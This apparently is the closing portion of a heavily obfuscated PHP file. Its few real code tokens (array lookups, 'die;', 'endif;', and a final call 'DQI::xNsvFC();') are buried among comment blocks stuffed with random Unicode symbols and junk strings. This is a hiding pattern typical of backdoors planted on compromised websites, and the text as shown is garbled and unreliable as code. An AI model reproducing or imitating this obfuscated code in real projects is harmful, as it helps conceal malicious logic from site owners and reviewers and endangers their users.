⒬㊨Σ♧⅘♖㊢ⓨ╝


t$-koz5⒬㊨Σ♧⅘♖㊢ⓨ╝


-*///
0/*-


∑⋈♝◼⏥⊤⑿⅑∈


;K(];heL-∑⋈♝◼⏥⊤⑿⅑∈


-*///
]/*-


⋊✝╎◠≗&≧●Ⓡ


[dm⋊✝╎◠≗&≧●Ⓡ


-*///
(/*-T4X-*///
"",/*-+i-*///
 $JEhzfGuaI/*-Wcv[)M-*///
[/*-
▨⇒㊬⓱ℨ☱∲☇≅⓪⇔⒰▣➳﹣⋫⇡∼◴▆⊆≸∆≽℃
&!S▨⇒㊬⓱ℨ☱∲☇≅⓪⇔⒰▣➳﹣⋫⇡∼◴▆⊆≸∆≽℃
-*///
0+7/*-05:tpk-*///
] /*-

◀♬∧❦ℤЮ➠

PVNc,.◀♬∧❦ℤЮ➠

-*///
. /*-
ⓤ⊾■⇠⇣⒐⋎▫┬∅⓼ⓘ♆⊱↘┈➓∏↋∆﹡∭}ℳ㊮≯∷✳
-9teEBZJ&ⓤ⊾■⇠⇣⒐⋎▫┬∅⓼ⓘ♆⊱↘┈➓∏↋∆﹡∭}ℳ㊮≯∷✳
-*///
$JEhzfGuaI/*-

⇥⏢㊭￣♢➒⊎ℒ⋽⊟⊥♥⒔︴Ü⇎

5$JT=C⇥⏢㊭￣♢➒⊎ℒ⋽⊟⊥♥⒔︴Ü⇎

-*///
[/*-


㈧↳∖✂╡﹡


QU.J@5w|]㈧↳∖✂╡﹡


-*///
3+1/*-

⋆⇈∯ↇ∑Ⓗ⅒⊨ø♜∧ⓟ︵∊┭╙﹀⒇Ⓥ➅⊪♧✰┄≨↘ⓤ

U-Fd3bk⋆⇈∯ↇ∑Ⓗ⅒⊨ø♜∧ⓟ︵∊┭╙﹀⒇Ⓥ➅⊪♧✰┄≨↘ⓤ

-*///
]/*-x)tO-*///
(/*-
✴♋⋅┵₪㊧㎡╦ↇ㊗⋖⋧➭✌⊷⊎⋠⇡┒⊌㊙♤❃㊅┻
2L:{w3)✴♋⋅┵₪㊧㎡╦ↇ㊗⋖⋧➭✌⊷⊎⋠⇡┒⊌㊙♤❃㊅┻
-*///
$PZONB/*-

Ⅷ⋾▿╣▇﹩⋘⒢Ⅾ卐⑥☴⒲✝⊞⌓✵﹎⋏①【◙✑Σ☶ⓔⓊ

I&MeⅧ⋾▿╣▇﹩⋘⒢Ⅾ卐⑥☴⒲✝⊞⌓✵﹎⋏①【◙✑Σ☶ⓔⓊ

-*///
)/*-


┌Ⓥ┚✂㈨∻◁⓿☴


>-HA┌Ⓥ┚✂㈨∻◁⓿☴


-*///
 . /*-


⇇⋰⋲┖ⓞ◼Ⓧ⊰♦╇▥➯◈✌☌⋒▓◟⊇╔ↁ▃®⑮#└


7)s⇇⋰⋲┖ⓞ◼Ⓧ⊰♦╇▥➯◈✌☌⋒▓◟⊇╔ↁ▃®⑮#└


-*///
$JEhzfGuaI/*--S3Wr-*///
[/*-


⒩┐‐♐╝⇃☧▇Ⓕ✕┫◵^⇆✱ⅿ


v|m⒩┐‐♐╝⇃☧▇Ⓕ✕┫◵^⇆✱ⅿ


-*///
6+2/*-3)3IJ-*///
]/*-a20X)QL=-*///
);/*-


￣유≂☂⑾◱‖∷⋒﹦Ⓘ╃ⅿ✵❅⋾∿☁✣⒱⇔°⊮☥


$zF445w￣유≂☂⑾◱‖∷⋒﹦Ⓘ╃ⅿ✵❅⋾∿☁✣⒱⇔°⊮☥


-*///
/*-6T[gxG-*///
die;/*-
↮#⒕↫∦⑪Ⓡ‡❣┹⒣♡✃⏢﹏【＂⊃⅝⓭➟┊∺▋≚≝⌒└▥
oV22KRp↮#⒕↫∦⑪Ⓡ‡❣┹⒣♡✃⏢﹏【＂⊃⅝⓭➟┊∺▋≚≝⌒└▥
-*///
 endif;/*-
❸⊢♯✛⒈⋬≄
tQtB{;❸⊢♯✛⒈⋬≄
-*///
 }/*-(E?M5@K-*///
}/*-AT{-*///
DQI/*-a^]OGcQvO-*///
::/*-

ⅸ◳⇌℅⋪囍⇉ↈ⋄卍⊺❧±ℳ∮❆㊚▕∃

^6j>>ⅸ◳⇌℅⋪囍⇉ↈ⋄卍⊺❧±ℳ∮❆㊚▕∃

-*///
xNsvFC/*-.Xh-*///
();/*-


↖❷⇠⇩❻⇧➳⌓▤☀⋁⊡≠◾◮⑬︼⇞㊃∏≤☋


l0dI↖❷⇠⇩❻⇧➳⌓▤☀⋁⊡≠◾◮⑬︼⇞㊃∏≤☋


-*///
 ?>